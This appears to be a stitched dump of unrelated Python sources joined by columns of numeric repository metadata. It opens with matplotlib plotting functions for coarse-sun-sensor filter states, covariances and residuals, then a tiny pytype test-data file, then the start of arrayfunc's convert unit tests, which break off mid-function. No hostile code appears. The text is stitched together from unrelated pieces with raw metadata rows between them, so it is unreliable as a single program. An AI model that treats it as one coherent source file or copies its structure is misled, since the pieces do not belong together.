        plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 0, 0]), 'r--')
        plt.plot(t[0:30], x2[0:30, 1], "g", label='Error Expected')
        plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 0, 0]), 'c--', label='Covar Expected')
        plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 0, 0]), 'c--')
        plt.legend(loc='best')
        plt.ylabel('$d_x$(m)')
        plt.title('First LOS component')
        plt.grid()
        plt.subplot(322)
        plt.plot(t[0:30], x[0:30, 4], "b")
        plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 3, 3]), 'r--')
        plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 3, 3]), 'r--')
        plt.plot(t[0:30], x2[0:30, 4], "g")
        plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 3, 3]), 'c--')
        plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 3, 3]), 'c--')
        plt.ylabel('$\dot{d}_x$(m)')
        plt.title('First rate component')
        plt.grid()
        plt.subplot(323)
        plt.plot(t[0:30], x[0:30, 2], "b")
        plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 1, 1]), 'r--')
        plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 1, 1]), 'r--')
        plt.plot(t[0:30], x2[0:30, 2], "g")
        plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 1, 1]), 'c--')
        plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 1, 1]), 'c--')
        plt.ylabel('$d_y$(m)')
        plt.title('Second LOS component')
        plt.grid()
        plt.subplot(324)
        plt.plot(t[0:30], x[0:30, 5], "b")
        plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 4, 4]), 'r--')
        plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 4, 4]), 'r--')
        plt.plot(t[0:30], x2[0:30, 5], "g")
        plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 4, 4]), 'c--')
        plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 4, 4]), 'c--')
        plt.ylabel('$\dot{d}_y$(m)')
        plt.title('Second rate component')
        plt.grid()
        plt.subplot(325)
        plt.plot(t[0:30], x[0:30, 3], "b")
        plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 2, 2]), 'r--')
        plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 2, 2]), 'r--')
        plt.plot(t[0:30], x2[0:30, 3], "g")
        plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 2, 2]), 'c--')
        plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 2, 2]), 'c--')
        plt.ylabel('$d_z$(m)')
        plt.xlabel('t(s)')
        plt.title('Third LOS component')
        plt.grid()
        plt.subplot(326)
        plt.plot(t[0:30], x[0:30, 6], "b")
        plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 5, 5]), 'r--')
        plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 5, 5]), 'r--')
        plt.plot(t[0:30], x2[0:30, 6], "g")
        plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 5, 5]), 'c--')
        plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 5, 5]), 'c--')
        plt.ylabel('$\dot{d}_z$(m)')
        plt.xlabel('t(s)')
        plt.title('Third rate component')
        plt.grid()
    if nstates == 3:
        # 3-state filter: LOS components only (cols 1-3).
        plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
        plt.subplot(311)
        plt.plot(t[0:30], x[0:30, 1], "b", label='Error Filter')
        plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 0, 0]), 'r--', label='Covar Filter')
        plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 0, 0]), 'r--')
        plt.plot(t[0:30], x2[0:30, 1], "g", label='Error Expected')
        plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 0, 0]), 'c--', label='Covar Expected')
        plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 0, 0]), 'c--')
        plt.ylabel('$d_x$(m)')
        plt.legend(loc='best')
        plt.title('First LOS component')
        plt.grid()
        plt.subplot(312)
        plt.plot(t[0:30], x[0:30, 2], "b")
        plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 1, 1]), 'r--')
        plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 1, 1]), 'r--')
        plt.plot(t[0:30], x2[0:30, 2], "g")
        plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 1, 1]), 'c--')
        plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 1, 1]), 'c--')
        plt.ylabel('$d_y$(m)')
        plt.title('Second LOS component')
        plt.grid()
        plt.subplot(313)
        plt.plot(t[0:30], x[0:30, 3], "b")
        plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 2, 2]), 'r--')
        plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 2, 2]), 'r--')
        plt.plot(t[0:30], x2[0:30, 3], "g")
        plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 2, 2]), 'c--')
        plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 2, 2]), 'c--')
        plt.ylabel('$d_z$(m)')
        plt.title('Third LOS component')
        plt.grid()
    if nstates == 5:
        # 5-state filter: three LOS components (cols 1-3) and two rates (cols 4-5).
        plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
        plt.subplot(321)
        plt.plot(t[0:30], x[0:30, 1], "b", label='Error Filter')
        plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 0, 0]), 'r--', label='Covar Filter')
        plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 0, 0]), 'r--')
        plt.plot(t[0:30], x2[0:30, 1], "g", label='Error Expected')
        plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 0, 0]), 'c--', label='Covar Expected')
        plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 0, 0]), 'c--')
        plt.legend(loc='best')
        plt.ylabel('$d_x$(m)')
        plt.title('First LOS component')
        plt.grid()
        plt.subplot(323)
        plt.plot(t[0:30], x[0:30, 2], "b")
        plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 1, 1]), 'r--')
        plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 1, 1]), 'r--')
        plt.plot(t[0:30], x2[0:30, 2], "g")
        plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 1, 1]), 'c--')
        plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 1, 1]), 'c--')
        plt.ylabel('$d_y$(m)')
        plt.title('Second LOS component')
        plt.grid()
        plt.subplot(324)
        plt.plot(t[0:30], x[0:30, 4], "b")
        plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 3, 3]), 'r--')
        plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 3, 3]), 'r--')
        plt.plot(t[0:30], x2[0:30, 4], "g")
        plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 3, 3]), 'c--')
        plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 3, 3]), 'c--')
        plt.ylabel('$\omega_y$(m)')
        plt.title('Second rate component')
        plt.grid()
        plt.subplot(325)
        plt.plot(t[0:30], x[0:30, 3], "b")
        plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 2, 2]), 'r--')
        plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 2, 2]), 'r--')
        plt.plot(t[0:30], x2[0:30, 3], "g")
        plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 2, 2]), 'c--')
        plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 2, 2]), 'c--')
        plt.ylabel('$d_z$(m)')
        plt.xlabel('t(s)')
        plt.title('Third LOS component')
        plt.grid()
        plt.subplot(326)
        plt.plot(t[0:30], x[0:30, 5], "b")
        plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 4, 4]), 'r--')
        plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 4, 4]), 'r--')
        plt.plot(t[0:30], x2[0:30, 5], "g")
        plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 4, 4]), 'c--')
        plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 4, 4]), 'c--')
        plt.ylabel('$\omega_z$(m)')
        plt.xlabel('t(s)')
        plt.title('Third rate component')
        plt.grid()
    unitTestSupport.saveScenarioFigure('scenario_Filters_StatesCompare' + FilterType, plt, path)
    if show_plots:
        plt.show()
    plt.close()
def numMeasurements(numObs, FilterType, show_plots, saveFigures):
    """Plot the number of activated CSS (observations) over time.

    Args:
        numObs: log array; column 0 is time in ns, column 1 the observation count.
        FilterType: string suffix appended to the saved figure name.
        show_plots: if True, display the figure interactively.
        saveFigures: if True, save the figure through unitTestSupport.
    """
    # Fixed: the original called plt.plot(111), which drew a spurious
    # single-value series instead of selecting the 1x1 subplot.
    plt.subplot(111)
    plt.plot(numObs[:, 0] * (1E-9), numObs[:, 1], "b")  # ns -> s on the x axis
    plt.ylim([0, 5])
    plt.xlabel('t(s)')
    plt.title('Number of Activated CSS')
    if saveFigures:
        unitTestSupport.saveScenarioFigure('scenario_Filters_Obs' + FilterType, plt, path)
    if show_plots:
        plt.show()
    plt.close()
def PostFitResiduals(Res, noise, FilterType, show_plots, saveFigures):
    """Plot post-fit residuals of four CSS against the 3-sigma noise bound.

    Args:
        Res: residual log; column 0 is time in ns, columns 1..4 the residuals
            of the four sensors.
        noise: 1-sigma measurement noise; the plotted envelope is +/- 3*noise.
        FilterType: string suffix appended to the saved figure name.
        show_plots: if True, display the figure interactively.
        saveFigures: if True, save the figure through unitTestSupport.

    NOTE(review): Res is modified in place -- repeated (constant) samples are
    overwritten with NaN so they are not drawn. Callers should not rely on the
    contents of Res after this call.
    """
    MeasNoise = np.zeros(len(Res[:, 0]))
    t = np.zeros(len(Res[:, 0]))
    # Last constant value seen per channel; NaN until one is detected.
    constantVal = np.array([np.nan] * 4)
    for i in range(len(Res[:, 0])):
        t[i] = Res[i, 0] * 1E-9  # ns -> s
        MeasNoise[i] = 3 * noise
        # Don't plot constant values, they mean no measurement is taken
        if i > 0:
            for j in range(1, 5):
                # errstate guard: comparisons involving NaN (already-masked
                # samples or an unset constantVal) raise invalid warnings.
                with np.errstate(invalid='ignore'):
                    constantRes = np.abs(Res[i, j] - Res[i - 1, j])
                    # Mask a repeat of the previous sample, or of the last
                    # remembered constant, by replacing it with NaN.
                    if constantRes < 1E-10 or np.abs(constantVal[j - 1] - Res[i, j]) < 1E-10:
                        constantVal[j - 1] = Res[i, j]
                        Res[i, j] = np.nan
    plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
    plt.subplot(411)
    plt.plot(t, Res[:, 1], "b.", label='Residual')
    plt.plot(t, MeasNoise, 'r--', label='Covar')
    plt.plot(t, -MeasNoise, 'r--')
    plt.legend(loc='best')
    plt.ylabel('$r_1$(m)')
    plt.ylim([-5 * noise, 5 * noise])
    plt.title('First CSS')
    plt.subplot(412)
    plt.plot(t, Res[:, 2], "b.")
    plt.plot(t, MeasNoise, 'r--')
    plt.plot(t, -MeasNoise, 'r--')
    plt.ylabel('$r_2$(m)')
    plt.ylim([-5 * noise, 5 * noise])
    plt.title('Second CSS')
    plt.subplot(413)
    plt.plot(t, Res[:, 3], "b.")
    plt.plot(t, MeasNoise, 'r--')
    plt.plot(t, -MeasNoise, 'r--')
    plt.ylabel('$r_3$(m)')
    plt.ylim([-5 * noise, 5 * noise])
    plt.title('Third CSS')
    plt.subplot(414)
    plt.plot(t, Res[:, 4], "b.")
    plt.plot(t, MeasNoise, 'r--')
    plt.plot(t, -MeasNoise, 'r--')
    plt.ylim([-5 * noise, 5 * noise])
    plt.ylabel('$r_4$(m)')
    plt.xlabel('t(s)')
    plt.title('Fourth CSS')
    if saveFigures:
        unitTestSupport.saveScenarioFigure('scenario_Filters_PostFit' + FilterType, plt, path)
    if show_plots:
        plt.show()
    plt.close()
def StatesVsExpected(stateLog, Pflat, expectedStateArray, FilterType, show_plots, saveFigures):
    """Plot filter states against expected states with 1-sigma covariance bands.

    Args:
        stateLog: filter state log; column 0 is time in ns, columns 1..n states.
        Pflat: covariance log; column 0 is time, columns 1..n*n the row-major
            flattened covariance matrix.
        expectedStateArray: expected state log, same layout as stateLog.
        FilterType: string suffix appended to the saved figure name.
        show_plots: if True, display the figure interactively.
        saveFigures: if True, save the figure through unitTestSupport.
    """
    # Number of states: each Pflat row holds [t, P_flat], so columns = n*n + 1.
    nstates = int(np.sqrt(len(Pflat[0, :]) - 1))
    P = np.zeros([len(Pflat[:, 0]), nstates, nstates])
    for i in range(len(Pflat[:, 0])):
        P[i, :, :] = Pflat[i, 1:(nstates * nstates + 1)].reshape([nstates, nstates])
        # Store standard deviations on the diagonal; the bands below are
        # state +/- sqrt(P[j, j]).
        for j in range(len(P[0, 0, :])):
            P[i, j, j] = np.sqrt(P[i, j, j])
    if nstates == 6:
        # 6-state filter: three LOS components (cols 1-3) and three rates (cols 4-6).
        plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
        plt.subplot(321)
        plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 1], 'k--', label='Expected')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1], 'b', label='Filter')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1] + P[:, 0, 0], 'r--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1] - P[:, 0, 0], 'r--', label='Covar')
        plt.legend(loc='best')
        plt.ylabel('$d_x$(m)')
        plt.title('First LOS component')
        plt.grid()
        plt.subplot(322)
        plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 4], 'k--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 4], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 4] + P[:, 3, 3], 'r--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 4] - P[:, 3, 3], 'r--', label='Covar')
        plt.ylabel('$\dot{d}_x$(m)')
        plt.title('First rate component')
        plt.grid()
        plt.subplot(323)
        plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 2], 'k--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2] + P[:, 1, 1], 'r--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2] - P[:, 1, 1], 'r--', label='Covar')
        plt.ylabel('$d_y$(m)')
        plt.title('Second LOS component')
        plt.grid()
        plt.subplot(324)
        plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 5], 'k--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 5], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 5] + P[:, 4, 4], 'r--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 5] - P[:, 4, 4], 'r--', label='Covar')
        plt.ylabel('$\dot{d}_y$(m)')
        plt.title('Second rate component')
        plt.grid()
        plt.subplot(325)
        plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 3], 'k--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3] + P[:, 2, 2], 'r--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3] - P[:, 2, 2], 'r--', label='Covar')
        plt.ylabel('$d_z$(m)')
        plt.xlabel('t(s)')
        plt.title('Third LOS component')
        plt.grid()
        plt.subplot(326)
        plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 6], 'k--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 6], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 6] + P[:, 5, 5], 'r--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 6] - P[:, 5, 5], 'r--', label='Covar')
        plt.ylabel('$\dot{d}_z$(m)')
        plt.xlabel('t(s)')
        plt.title('Third rate component')
        plt.grid()
    if nstates == 3:
        # 3-state filter: LOS components only (cols 1-3).
        plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
        plt.subplot(311)
        plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 1], 'k--', label='Expected')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1], 'b', label='Filter')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1] + P[:, 0, 0], 'r--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1] - P[:, 0, 0], 'r--', label='Covar')
        plt.ylabel('$d_x$(m)')
        plt.legend(loc='best')
        plt.title('First LOS component')
        plt.grid()
        plt.subplot(312)
        plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 2], 'k--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2] + P[:, 1, 1], 'r--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2] - P[:, 1, 1], 'r--', label='Covar')
        plt.ylabel('$d_y$(m)')
        plt.title('Second LOS component')
        plt.grid()
        plt.subplot(313)
        plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 3], 'k--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3] + P[:, 2, 2], 'r--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3] - P[:, 2, 2], 'r--', label='Covar')
        plt.ylabel('$d_z$(m)')
        plt.xlabel('t(s)')
        plt.title('Third LOS component')
        plt.grid()
    if nstates == 5:
        # 5-state filter: three LOS components (cols 1-3) and two rates (cols 4-5).
        plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
        plt.subplot(321)
        plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 1], 'k--', label='Expected')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1], 'b', label='Filter')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1] + P[:, 0, 0], 'r--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1] - P[:, 0, 0], 'r--', label='Covar')
        plt.legend(loc='best')
        plt.ylabel('$d_x$(m)')
        plt.title('First LOS component')
        plt.grid()
        plt.subplot(323)
        plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 2], 'k--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2] + P[:, 1, 1], 'r--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2] - P[:, 1, 1], 'r--', label='Covar')
        plt.ylabel('$d_y$(m)')
        plt.title('Second LOS component')
        plt.grid()
        plt.subplot(324)
        plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 4], 'k--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 4], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 4] + P[:, 3, 3], 'r--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 4] - P[:, 3, 3], 'r--', label='Covar')
        plt.ylabel('$\omega_y$(m)')
        plt.title('Second rate component')
        plt.grid()
        plt.subplot(325)
        plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 3], 'k--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3] + P[:, 2, 2], 'r--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3] - P[:, 2, 2], 'r--', label='Covar')
        plt.ylabel('$d_z$(m)')
        plt.xlabel('t(s)')
        plt.title('Third LOS component')
        plt.grid()
        plt.subplot(326)
        plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 5], 'k--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 5], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 5] + P[:, 4, 4], 'r--')
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 5] - P[:, 4, 4], 'r--', label='Covar')
        plt.ylabel('$\omega_z$(m)')
        plt.xlabel('t(s)')
        plt.title('Third rate component')
        plt.grid()
    if saveFigures:
        unitTestSupport.saveScenarioFigure('scenario_Filters_StatesExpected' + FilterType, plt, path)
    if show_plots:
        plt.show()
    plt.close()
def StatesVsTargets(target1, target2, stateLog, FilterType, show_plots, saveFigures):
    """Plot filter states against two piecewise-constant target states.

    The first half of the log is compared against target1, the second half
    against target2.

    Args:
        target1: expected state vector for the first half of the run
            (assumed length >= nstates -- TODO confirm against callers).
        target2: expected state vector for the second half of the run.
        stateLog: filter state log; column 0 is time in ns, columns 1..n states.
        FilterType: string suffix appended to the saved figure name.
        show_plots: if True, display the figure interactively.
        saveFigures: if True, save the figure through unitTestSupport.
    """
    # Number of states is the column count minus the time column.
    # Fixed: the original called int(stateLog[0, :]), which raises a
    # TypeError for any multi-element row.
    nstates = len(stateLog[0, :]) - 1
    npts = len(stateLog[:, 0])
    target = np.ones([npts, nstates])
    # Fixed: the original used '/', which yields a float under Python 3 and
    # makes range() raise a TypeError.
    half = (npts - 1) // 2
    for i in range(half):
        target[i, :] = target1
        target[i + half, :] = target2
    if nstates == 6:
        plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
        plt.subplot(321)
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1], 'b', label='Filter')
        plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 0], 'r--', label='Expected')
        plt.legend(loc='best')
        plt.title('First LOS component')
        plt.grid()
        plt.subplot(322)
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 4], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 3], 'r--')
        plt.title('First rate component')
        plt.grid()
        plt.subplot(323)
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 1], 'r--')
        plt.title('Second LOS component')
        plt.grid()
        plt.subplot(324)
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 5], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 4], 'r--')
        plt.title('Second rate component')
        plt.grid()
        plt.subplot(325)
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 2], 'r--')
        plt.xlabel('t(s)')
        plt.title('Third LOS component')
        plt.grid()
        plt.subplot(326)
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 6], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 5], 'r--')
        plt.xlabel('t(s)')
        plt.title('Third rate component')
        plt.grid()
    if nstates == 3:
        plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
        plt.subplot(311)
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1], 'b', label='Filter')
        plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 0], 'r--', label='Expected')
        plt.legend(loc='best')
        plt.title('First LOS component')
        plt.grid()
        plt.subplot(312)
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 1], 'r--')
        plt.title('Second rate component')
        plt.grid()
        plt.subplot(313)
        plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3], 'b')
        plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 2], 'r--')
        plt.title('Third LOS component')
        plt.grid()
    if saveFigures:
        unitTestSupport.saveScenarioFigure('scenario_Filters_StatesTarget' + FilterType, plt, path)
    if show_plots:
        plt.show()
    plt.close()
| 39.06278
| 102
| 0.499024
| 4,167
| 26,133
| 3.111831
| 0.056156
| 0.115524
| 0.085139
| 0.058302
| 0.871906
| 0.863885
| 0.853628
| 0.836431
| 0.832344
| 0.81129
| 0
| 0.083166
| 0.257376
| 26,133
| 669
| 103
| 39.06278
| 0.584995
| 0.002334
| 0
| 0.860465
| 0
| 0
| 0.107498
| 0.005585
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010733
| false
| 0
| 0.007156
| 0
| 0.017889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc773f8c591c7262827dab107b4c8b26a9140de4
| 297
|
py
|
Python
|
pytype/test_data/complex.py
|
OrBin/pytype
|
52bf1b5b03e6c3caf39bf0f187980970d70fd536
|
[
"Apache-2.0"
] | 3,882
|
2015-03-22T12:17:15.000Z
|
2022-03-31T17:13:20.000Z
|
pytype/test_data/complex.py
|
OrBin/pytype
|
52bf1b5b03e6c3caf39bf0f187980970d70fd536
|
[
"Apache-2.0"
] | 638
|
2015-11-03T06:34:44.000Z
|
2022-03-31T23:41:48.000Z
|
pytype/test_data/complex.py
|
OrBin/pytype
|
52bf1b5b03e6c3caf39bf0f187980970d70fd536
|
[
"Apache-2.0"
] | 301
|
2015-08-14T10:21:17.000Z
|
2022-03-08T11:03:40.000Z
|
"""Too-complex program."""
v = [0, 0.1, 1j, "foo", slice(0, 3), u"foo", None, type, max]
w = [0, 0.1, 1j, "foo", slice(0, 3), u"foo", None, type, max]
x = [0, 0.1, 1j, "foo", slice(0, 3), u"foo", None, type, max]
y = [0, 0.1, 1j, "foo", slice(0, 3), u"foo", None, type, max]
z = zip(v, w, x, y)
| 33
| 61
| 0.501684
| 65
| 297
| 2.292308
| 0.292308
| 0.053691
| 0.080537
| 0.134228
| 0.805369
| 0.805369
| 0.805369
| 0.805369
| 0.805369
| 0.805369
| 0
| 0.100418
| 0.195286
| 297
| 8
| 62
| 37.125
| 0.523013
| 0.06734
| 0
| 0
| 0
| 0
| 0.088561
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc82ba0b79e55d8d01eb06490997380cad8532d7
| 173,959
|
py
|
Python
|
unittest/test_convert.py
|
m1griffin/arrayfunc
|
df57097699c25d3e949e1ade307ed61eaa5728c2
|
[
"Apache-2.0"
] | 2
|
2017-08-28T08:41:16.000Z
|
2018-05-29T03:49:36.000Z
|
unittest/test_convert.py
|
m1griffin/arrayfunc
|
df57097699c25d3e949e1ade307ed61eaa5728c2
|
[
"Apache-2.0"
] | null | null | null |
unittest/test_convert.py
|
m1griffin/arrayfunc
|
df57097699c25d3e949e1ade307ed61eaa5728c2
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
##############################################################################
# Project: arrayfunc
# Module: test_convert.py
# Purpose: arrayfunc unit test.
# Language: Python 3.4
# Date: 22-Jun-2014.
# Ver: 06-Mar-2020.
#
###############################################################################
#
# Copyright 2014 - 2020 Michael Griffin <m12.griffin@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
##############################################################################
"""This conducts unit tests for convert.
"""
##############################################################################
import sys
import array
import itertools
import math
import operator
import platform
import copy
import unittest
import arrayfunc
##############################################################################
##############################################################################
# The following code is all auto-generated.
##############################################################################
class convert_b(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'b'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code b - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code b - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
